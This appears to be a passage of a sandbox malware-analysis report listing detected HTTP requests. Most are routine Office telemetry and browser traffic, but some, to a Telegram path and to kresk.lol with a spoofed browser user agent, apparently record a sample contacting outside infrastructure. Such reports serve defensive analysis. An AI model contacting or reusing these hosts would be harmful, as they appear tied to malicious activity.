    Source: global trafficHTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /m3wm0w HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_8) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6Host: kresk.lolConnection: Keep-AliveCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule701100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120128v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120603v8s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120607v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIkqHLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
    Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
    Source: global trafficHTTP traffic detected: GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1Host: api.edgeoffer.microsoft.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /bundles/v1/edgeChromium/latest/vendors.7e27cca6027b8d6697cb.js HTTP/1.1Host: assets2.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://ntp.msn.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1Host: clients2.googleusercontent.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
    Source: global trafficHTTP traffic detected: GET /assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1Host: edgeassetservice.azureedge.netConnection: keep-aliveEdge-Asset-Group: EntityExtractionDomainsConfigSec-Mesh-Client-Edge-Version: 117.0.2045.55Sec-Mesh-Client-Edge-Channel: stableSec-Mesh-Client-OS: WindowsSec-Mesh-Client-OS-Version: 10.0.19045Sec-Mesh-Client-Arch: x86_64Sec-Mesh-Client-WebView: 0Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
